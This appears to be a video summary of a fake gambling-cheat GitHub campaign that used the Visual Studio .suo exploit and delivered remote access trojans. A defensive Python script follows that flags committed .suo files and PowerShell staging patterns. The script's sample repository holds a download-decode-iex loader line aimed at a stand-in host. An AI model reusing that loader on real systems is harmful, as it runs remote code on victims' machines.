FAKE Gambling Cheat Runs Malware

This video explores the malicious use of GitHub repositories hosting malware, particularly targeting online gambling platforms like stake.com, using sophisticated techniques such as Visual Studio evil solution exploits and deserialization vulnerabilities. It also uncovers the active deployment of remote access Trojans (RATs), including Remos RAT, through links distributed via social media platforms like Instagram, Telegram, and YouTube. #RemosRat #VisualStudioEvilSolution

Key points:

  • The GitHub repository "Limbo Casino Predictor Strategies" included malware that exploited Visual Studio deserialization vulnerabilities.
  • The malware used the .suo (solution user options) exploit, which runs malicious code automatically when the solution file is opened in Visual Studio.
  • Decrypted payloads reveal the stages of infection, including remote access Trojans such as Remos RAT and other malicious binaries.
  • The malware infrastructure relies on social media and GitHub repositories to host and stage malicious payloads.
  • Later stages use PowerShell scripts that download, decrypt, and execute malicious code fetched from command-and-control (C2) servers.
  • The malware is actively promoted and distributed via Instagram, Telegram, and YouTube links, often embedded in social media posts.
  • The attack chain includes heavy obfuscation, staged payloads, and the reuse of old, sometimes abandoned, repositories and accounts.
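The key points describe two things a defender can check for before opening an untrusted repository in Visual Studio: committed .suo user-option files (OLE compound documents that Visual Studio deserializes when the solution is opened) and scripts that carry the download, decode, execute staging chain. The following triage script is an added example, not code from the video or from any repository it discusses; the indicator names, the two-stage threshold, and the sample repository contents are this example's own assumptions.

```python
"""Triage a cloned repository before opening its solution in Visual Studio.

Added example (not from the video or any project it discusses). It flags
Visual Studio user-option files (.suo), which are OLE compound documents
that Visual Studio deserializes on open, and scripts whose contents match
a PowerShell download -> decode -> execute staging chain. The pattern
names and the "two or more stages" threshold are assumptions of this
example, not a published detection rule.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Magic bytes of an OLE2 compound document (the container format of .suo files).
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"

# Assumed staging indicators: (stage name, regex). Each mirrors one step of
# the chain described in the key points; a deployment would tune these.
STAGING_PATTERNS = [
    ("download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I)),
    ("decode", re.compile(r"FromBase64String|-EncodedCommand|-enc\b", re.I)),
    ("execute", re.compile(r"Invoke-Expression|\biex\b|Start-Process", re.I)),
    ("hidden", re.compile(r"-WindowStyle\s+Hidden|-w\s+hidden|-NoProfile|-nop\b", re.I)),
]


@dataclass
class Finding:
    path: str
    reason: str
    tags: List[str] = field(default_factory=list)


def is_ole_compound(data: bytes) -> bool:
    """True if the bytes begin with the OLE2 compound-document signature."""
    return data.startswith(OLE_MAGIC)


def scan_text(text: str) -> List[str]:
    """Return the names of the staging stages present in a script body."""
    return [name for name, rx in STAGING_PATTERNS if rx.search(text)]


def triage_file(path: str, data: bytes) -> Optional[Finding]:
    """Classify one file by path and (partial) contents."""
    name = os.path.basename(path).lower()
    parts = path.replace("\\", "/").split("/")
    # .suo files live under .vs/ in modern Visual Studio and are normally
    # git-ignored; a committed one deserves a look before the solution opens.
    if name.endswith(".suo") or ".vs" in parts:
        reason = "Visual Studio user-options artifact committed to repo"
        if is_ole_compound(data):
            reason += " (OLE compound document; deserialized by VS on open)"
        return Finding(path, reason, ["suo"])
    tags = scan_text(data.decode("utf-8", errors="ignore"))
    # A lone download or execute call is common in honest build scripts; the
    # staged-payload chain shows up as several stages in one file.
    if len(tags) >= 2:
        return Finding(path, "PowerShell staging chain indicators", tags)
    return None


def triage_tree(files: Dict[str, bytes]) -> List[Finding]:
    """files maps relative path -> bytes. Returns findings sorted by path."""
    findings = [f for f in (triage_file(p, d) for p, d in files.items()) if f]
    return sorted(findings, key=lambda f: f.path)


def triage_dir(root: str) -> List[Finding]:
    """Walk a real checkout, reading at most 64 KiB per file."""
    files: Dict[str, bytes] = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            full = os.path.join(dirpath, n)
            with open(full, "rb") as fh:
                files[os.path.relpath(full, root)] = fh.read(65536)
    return triage_tree(files)


# Constructed sample repository contents (not files from the video).
SAMPLE_REPO = {
    "Predictor.sln": b"Microsoft Visual Studio Solution File, Format Version 12.00\n",
    ".vs/Predictor/v17/.suo": OLE_MAGIC + b"\x00" * 64,
    "build.ps1": b"dotnet build Predictor.sln\n",
    "tools/update.ps1": (b"$u='https://example.invalid/p.txt'\n"
                         b"$d=(New-Object Net.WebClient).DownloadString($u)\n"
                         b"iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))\n"),
}

if __name__ == "__main__":
    for f in triage_tree(SAMPLE_REPO):
        print(f"{f.path}: {f.reason} {f.tags}")
```

On the constructed sample, the committed `.suo` and `tools/update.ps1` are flagged while the ordinary build script is not; `triage_dir(path)` runs the same checks over a real checkout. The check is a pre-open hygiene step, not a verdict: a clean result only means none of these particular artifacts were found.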